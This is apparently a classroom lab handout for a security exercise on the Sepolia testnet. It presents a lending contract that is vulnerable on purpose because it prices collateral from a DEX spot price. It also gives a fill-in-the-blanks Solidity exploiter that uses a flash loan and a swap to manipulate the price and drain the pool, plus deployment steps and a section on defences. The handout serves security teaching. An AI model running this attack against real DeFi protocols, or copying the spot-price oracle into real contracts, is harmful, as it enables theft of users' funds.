
# Exploiting a Lending Protocol via Oracle Manipulation

## Introduction

In this lab, you will play the role of a DeFi attacker exploiting a vulnerable lending protocol on the **Sepolia testnet**. The target is a simple lending contract that relies on a **price oracle** from a decentralized exchange. By manipulating the oracle's price feed, you'll trick the protocol into letting you drain its funds. Students pull off the exploit and win the "jackpot" one by one.

**Setup assumptions:** You have an Ethereum wallet (MetaMask or similar) connected to Sepolia and some test **Sepolia ETH** for gas in your wallet.

---

## The Vulnerable Lending Protocol

**Protocol Overview:** The lending contract allows users to **deposit TIGER tokens as collateral** and **borrow LUSD stablecoins** against that collateral. It determines the collateral’s value using a **price oracle** – in this case, the *current exchange rate from a TIGER/LUSD decentralized exchange pair*. There is no administrator setting the price; the contract simply trusts the DEX’s spot price. 

**Why it's vulnerable:** Using a live DEX price directly is dangerous because an attacker can **manipulate the price** with trades. The contract doesn’t use any time-weighted average or external oracle – it just reads the instantaneous pool ratio. This means a sudden buy or sell on the TIGER/LUSD pool can wildly skew the reported price. An attacker can pump the TIGER price to absurd levels *within one transaction*, tricking the lending contract into thinking the collateral is worth far more LUSD than it actually is. As one security analysis notes, protocols that naively use a liquidity pool’s spot price as their oracle are *“almost 100%” guaranteed to get rekt by a flash loan or price manipulation attack* ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=All%20these%20questions%20fit%20critically,with%20a%20larger%20market%20cap)).

**Contract behavior:** When you call the lending contract’s borrow function, it roughly does the following:

- **Checks your collateral value:** It queries the TIGER/LUSD pair for reserves to compute the price of TIGER. For example, if the pair has `(reserveTIGER, reserveLUSD)`, the price of 1 TIGER (in LUSD) might be calculated as `price = reserveLUSD / reserveTIGER`. Then `collateralValue = yourTigerBalance * price`. (No sanity checks or time averaging are applied.)
- **Ensures sufficient collateral:** If your collateral value (in LUSD) is *at least* the amount of LUSD you want to borrow, it proceeds. (For simplicity, assume a 1:1 collateral ratio requirement – no extra margin – making the exploit even easier.)
- **Transfers LUSD to you:** If the check passes, the contract transfers the requested LUSD from its pool to your address, as a loan.

Below is the core logic of the lending protocol: (Note that we have removed some parts of the code that are only for the purpose of the lab and only the admin can use them for simplicity. You don't need to worry about them. However, you can see the full code on Etherscan.)

```javascript
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "@uniswap/v3-core/contracts/interfaces/IUniswapV3Pool.sol";
import "@uniswap/swap-router-contracts/contracts/interfaces/IV3SwapRouter.sol";
import "@uniswap/lib/contracts/libraries/TransferHelper.sol";

interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transfer(address, uint256) external returns (bool);
    function transferFrom(address, address, uint256) external returns (bool);
    function approve(address, uint256) external returns (bool);
}

interface IFlashLoanReceiver {
    function executeFlashLoan(uint256 amount) external;
}

contract LendingProtocol {
    IERC20 public immutable tiger;
    IERC20 public immutable lusd;
    IUniswapV3Pool public immutable pricePool;
    
    mapping(address => uint256) public collateralBalance;
    mapping(address => bool) public blocked;
    address public reserveAddress;
    uint256 public totalReserveAmount; // Reserve for refilling
    uint256 public initialPoolSize;
    uint256 public flashLoanReserve; // 1 Billion LUSD for flash loans
    uint256 public LUSDAvailableLiquidity; // LUSD liquidity available for borrowing
    address private constant SWAP_ROUTER = 0x3bFA4769FB09eefC5a80d6E87c3B9C650f7Ae48E;

    IV3SwapRouter public immutable swapRouter = IV3SwapRouter(SWAP_ROUTER);

    event Borrowed(address indexed user, uint256 amount);
    event ExploitDetected(address indexed exploiter, uint256 amount);
    event FlashLoanExecuted(address indexed borrower, uint256 amount);

    constructor(
        address _tiger, 
        address _lusd, 
        address _pool, 
        uint256 _initialPoolSize, 
        uint256 _reserveAmount,
        uint256 _flashLoanReserve
    ) {
        tiger = IERC20(_tiger);
        lusd = IERC20(_lusd);
        pricePool = IUniswapV3Pool(_pool);
        
        reserveAddress = msg.sender;
        initialPoolSize = _initialPoolSize;
        totalReserveAmount = _reserveAmount;
        flashLoanReserve = _flashLoanReserve;
    }

    function initialFunding() external {...}

    function depositCollateral(uint256 collateralAmount) external {
        require(!blocked[msg.sender], "blocked");
        require(tiger.transferFrom(msg.sender, address(this), collateralAmount), "Collateral transfer failed");
        collateralBalance[msg.sender] += collateralAmount;
    }

    function _getTigerPrice() internal view returns (uint256) {
        (uint160 sqrtPriceX96, , , , , , ) = pricePool.slot0();
        uint256 price = uint256(sqrtPriceX96) * uint256(sqrtPriceX96) >> (96 * 2);
    
        return price;
    }

    function borrow(uint256 amountLUSD) external {
        require(!blocked[msg.sender], "blocked");

        uint256 collateralValue = collateralBalance[msg.sender] * _getTigerPrice();
        require(collateralValue >= amountLUSD, "Insufficient collateral value");
        require(LUSDAvailableLiquidity >= amountLUSD, "Not enough liquidity");

        lusd.transfer(msg.sender, amountLUSD);
        LUSDAvailableLiquidity -= amountLUSD;
        emit Borrowed(msg.sender, amountLUSD);

        // If exploited (full pool drain), fix the pool price and trigger auto-refill
        ...
    }

    function requestFlashLoan(uint256 amount) external {
        require(amount <= flashLoanReserve, "Insufficient flash loan reserve");

        // Send the funds to the borrower
        lusd.transfer(msg.sender, amount);
        IFlashLoanReceiver(msg.sender).executeFlashLoan(amount);

        // Ensure full repayment
        require(lusd.balanceOf(address(this)) >= flashLoanReserve, "Flash loan not fully repaid");

        emit FlashLoanExecuted(msg.sender, amount);
    }

    function refund() external {...}
}
```

**Key vulnerability:** The `_getTigerPrice()` function simply uses the DEX reserve ratio as the price. If you can drastically lower `reserveTIGER` relative to `reserveLUSD` (by buying up TIGER from the pool), the calculated price skyrockets. The contract will think your collateral is worth a fortune in LUSD, allowing you to borrow the **entire LUSD pool** with a minimal amount of TIGER deposited. There are no oracles like Chainlink or time-weighted average prices (TWAP) to prevent this – it’s entirely trusting the manipulable spot price ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=,downside%20is%20that%20they%20are)).

**Addresses:**
- *Lending Contract:* Deployed at `0xF0fad7dE8e0751DCe8cc1F396F694F63A7D92D57` on Sepolia.
- *TIGER Token:* `0x0F47E03a0383396635846f8495003fc478b71bcA` (ERC20 used as collateral).
- *LUSD Token:* `0x9142FA65aAEf921Aea2127e88758adeE0510a0F0` (ERC20 stablecoin for loans).
- *TIGER/LUSD DEX Pair:* `0x029603931809d430ae47d2f55212CC0E89Dbfd52` providing the price feed.

---

## Exploit Strategy Overview

To exploit this lending protocol, the high-level strategy is:

1. **Acquire TIGER cheaply, then inflate its price.** Use LUSD to buy a large amount of TIGER from the TIGER/LUSD pool. This trade will remove TIGER from the pool and put in LUSD, causing the pool price of TIGER to shoot up (because now **each TIGER is backed by more LUSD in the pool**). This swap is done by taking a flashloan of LUSD, so, you don't need to own any LUSD beforehand.

2. **Borrow LUSD against overpriced TIGER collateral.** With the price now artificially high, even a small TIGER deposit is valued extremely high by the lending contract. You call the borrow function to take as much LUSD as possible. The goal is to **drain the LUSD pool** (the “jackpot”). Since the contract thinks your collateral is ample, it will give you all its LUSD.

3. (Optional for profit realism) You could swap back the TIGER for LUSD after borrowing, to return the price to normal and pocket the difference. However, in this simplified competition, you don’t actually need to do this to succeed – draining the pool is enough to win the round.

**Why a contract?** While you could attempt the steps manually (buy TIGER on a DEX, then call borrow), using a **custom exploit contract** has advantages:
- It lets you sequence actions within one transaction or script, making the exploit faster and more automated (important if racing other attackers).
- You can use flashloans (a flashloan needs to be borrowed and paid back in the same transaction) and perform the attack without owning a lot of tokens beforehand.
- It can hold tokens and interact with multiple contracts (DEX and lending) in one place.
- You can easily reuse the exploit code for each attempt by just deploying a new instance (if your first address gets blocked).


In this lab, you are given a partially complete exploit contract. Your job is to fill in the missing pieces, deploy it, and execute the exploit.

---

## The Exploiter Contract (Fill-in-the-Blanks)

Below is the Solidity code for the exploiter contract, **with parts left blank** for you to complete. This contract will perform the two main actions: **manipulate the price** on the DEX, and then **borrow** from the lending protocol. Study the code and the comments, then fill in the `// TODO` sections.

```javascript
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "@uniswap/swap-router-contracts/contracts/interfaces/IV3SwapRouter.sol";
import "@uniswap/lib/contracts/libraries/TransferHelper.sol";

interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transfer(address, uint256) external returns (bool);
    function transferFrom(address, address, uint256) external returns (bool);
    function approve(address, uint256) external returns (bool);
}

interface ILendingProtocol {
    function LUSDAvailableLiquidity() external returns (uint256);
    function borrow(uint256 amount) external;
    function requestFlashLoan(uint256 amount) external;
    function depositCollateral(uint256 amount) external;
}

contract Exploiter {
    IERC20 public tiger;
    IERC20 public lusd;
    ILendingProtocol public lending;

    address private constant SWAP_ROUTER = 0x3bFA4769FB09eefC5a80d6E87c3B9C650f7Ae48E;
    uint256 private constant MAX_UINT = 2**256 - 1;

    IV3SwapRouter public immutable swapRouter = IV3SwapRouter(SWAP_ROUTER);

    constructor(address _tiger, address _lusd, address _lending) {
        tiger = IERC20(_tiger);
        lusd = IERC20(_lusd);
        lending = ILendingProtocol(_lending);
        
        // Approve max spending
        tiger.approve(____________, MAX_UINT); // TODO: Fill in the correct address
        lusd.approve(____________, MAX_UINT); // TODO: Fill in the correct address
    }

    function executeFlashLoan(uint256 flashAmount) external {
        // 1. Swap flash loaned LUSD for TIGER on Uniswap V3
        // TODO: Fill in the correct parameters
        IV3SwapRouter.ExactInputSingleParams memory params = IV3SwapRouter
        .ExactInputSingleParams({
            tokenIn: ____________, 
            tokenOut: ____________, 
            fee: ____________, // Pool fee tier (0.05%)
            recipient: ____________,
            amountIn: ____________,
            amountOutMinimum: 0,
            sqrtPriceLimitX96: 0
        });

        uint256 tigerAmount = ____________.exactInputSingle(params); // TODO: Fill in function to execute the swap

        // 2. Use overpriced TIGER as collateral and borrow all available LUSD
        tiger.approve(____________, MAX_UINT); // TODO: Fill in the correct address
        ____________.____________(____________); // TODO: deposit collateral to the lending contract
        uint256 availableLusd = lending.LUSDAvailableLiquidity();
        lending.____________(availableLusd);  // TODO: Fill in function to borrow max LUSD

        // 3. Repay flash loan
        ____________.transfer(____________, ____________);  // TODO: Return the flash loan

        // Exploiter now keeps remaining LUSD as profit
    }

    function exploit(uint256 flashAmount) external {
        // Request a flash loan from the lending contract
        lending.____________(flashAmount);  // TODO: Fill in function to request a flash loan
    }
}
```

Once these parts are filled in, you can compile and deploy this contract to Sepolia, then run the exploit.

---

## Deploying and Running the Exploit

Follow these steps to execute your attack on the Sepolia testnet:

1. **Get the contract addresses & tokens:** Make sure you have the addresses for the lending contract, TIGER token, LUSD token, and the TIGER/LUSD pair. You will need to pass them as the constructor parameters.

2. **Compile the exploit contract:** You can use Remix (browser Solidity IDE) to compile the `Exploiter` contract. In Remix, paste the Solidity code (with your filled sections).

3. **Deploy the contract:** Deploy `Exploiter` to **Sepolia**. Use your wallet (connected to Sepolia) and be ready to confirm the transaction and pay a small amount of test ETH for gas. After deploying, note the **address of your exploit contract**.

4. **Execute the attack (call `exploit()`):** In Remix, with the deployed exploit contract selected, call the `exploit()` function. This will trigger your contract to:
   - Request LUSD flash loan,
   - swap LUSD for TIGER on the DEX pair (manipulating the price), 
   - borrow LUSD from the lending pool,
   - repay the flash loan and keep the remaining LUSD as profit.

   Confirm the transaction. If your exploit succeeds, this single transaction will drain the lending pool’s LUSD into your contract!

5. **Observe the outcome:** After running `exploit()`:
   - Check the **LUSD balance** of your exploit contract. It should have increased by the amount drained from the lending pool (minus whatever LUSD you spent on the swap). Essentially, this is your “stolen” amount.
   - The lending contract should have **blocked your address** (the exploit contract’s address) from further borrowing. If you try to call `borrow` again (or deposit more and borrow), it should revert with "blocked". This ensures you can’t win twice.
   - The instructor (the process is automated!) will now **refill the lending pool** for the next round and bring the Uniswap pool price back to normal.

**Tip:** If you encounter any issues (for example, the swap not pulling out as much TIGER as expected, or running out of gas), double-check:
   - Your contract is borrowing enough LUSD.
   - Approval is set correctly.
   - That you used the correct parameter order for the swap.
   - Your borrow amount was correct (it should equal the pool’s full remaining LUSD). Borrowing *exactly* the pool balance ensures you drain it completely; if you borrow less, some tokens stay and the jackpot isn’t fully taken (allowing someone else to grab the rest).
   - That your address wasn’t already blocked (only happens if you already won in a prior round).
   - If your metamask is not connecting to Remix properly, you can use WalletConnect instead of InjectedProvider and connect your metamask wallet using it.

---

## Jackpot Rounds and blocking Mechanism

This lending contract is set up to allow **multiple exploits in succession**, so that after one student succeeds, others still have a chance (with diminishing rewards). Here’s how it works:

- **Initial round:** The instructor funded the contract with the full original LUSD amount (the initial jackpot). The first student to exploit the contract will withdraw most or all of these funds. The contract then **blocks the exploiter’s address** (so the same student cannot simply repeat).

- **TIGER price back to normal:** After each drain, the contract brings the price of the Uniswap pool back to normal. It does so by swapping the abandoned TIGER as the collateral in the lending contract for LUSD.  Now a second student can perform the same exploit on a smaller pool. The second exploiter’s address will then be blocked as well.

- **Refill:** The available LUSD liquidity to borrow gets refilled. A new attacker can win this amount. After draining, that address is blocked.

- **Subsequent rounds:** The pattern continues till all the students have exploited the contract. 

**blocking:** The contract uses a mapping to permanently record addresses that have already won. If a blocked address tries to interact (deposit or borrow), the contract will reject them.

*⚠️ Note:* All the exploits are happening on a public test network. Be mindful that anyone with the contract address and know-how could attempt the exploit. In a classroom setting, this is fine (and part of the fun), but remember on real networks this kind of vulnerability is catastrophic. Real attackers bundle steps into a single atomic transaction (often with flash loans) to ensure they cannot be outpaced or the price returns to normal before they act.

---

## Challenge: Defending Against Oracle Manipulation

You’ve seen how trivial it is to exploit a lending protocol that uses an **insecure price oracle**. **Why was this attack possible, and how could the protocol have been designed to prevent it?** Consider and discuss the following:

- **Oracle Design:** What if the protocol used a more reliable price feed instead of a raw DEX price? For example, **Chainlink** or another decentralized oracle network provides aggregated price data that is **significantly harder to manipulate** (an attacker would need to corrupt a majority of oracles ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=loans.%20,nodes%20on%20a%20price%20feed))】. How would using such an oracle help here?

- **Price Averaging:** DEXes like Uniswap v2/v3 offer a **Time-Weighted Average Price (TWAP)** oracle. This means the price is averaged over a window of time, making rapid swings (like those from flash trades) much less effective. Flash loan attacks usually manipulate price within one block, but a TWAP would **smooth out the price**, making the oracle **resistant to instantaneous manipulation* ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=,lagging%20indicator%20of%20price%20values))】. What are the trade-offs of using a TWAP (consider price latency vs. safety)?

- **Collateral and Liquidity Safeguards:** How might the lending protocol itself limit damage? Think about adding **collateralization ratios** (requiring more collateral than the value of the loan), **borrow limits**, or **circuit breakers** that pause borrowing if prices move too fast. Could requiring multiple price sources or a delay before using a new price update help?

Reflect on how real-world lending platforms (Compound, Aave, etc.) implement protections. By understanding these defenses, you’ll appreciate what goes into designing secure DeFi protocols and why oracle choice is critical. **Discuss your ideas** in your submission – this is an open-ended challenge with multiple valid approaches.

---

**Congratulations** on completing the exploit lab! You’ve learned how oracle manipulation attacks can wreak havoc on insecure DeFi contracts. This hands-on experience should also underscore the importance of robust oracle mechanisms in any lending protocol. Now that you’ve seen how to break the system, think about how to build it stronger. Happy hacking (for education) ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=,decentralized%20in%20nature%2C%20are%20significantly)) ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=,lagging%20indicator%20of%20price%20values))】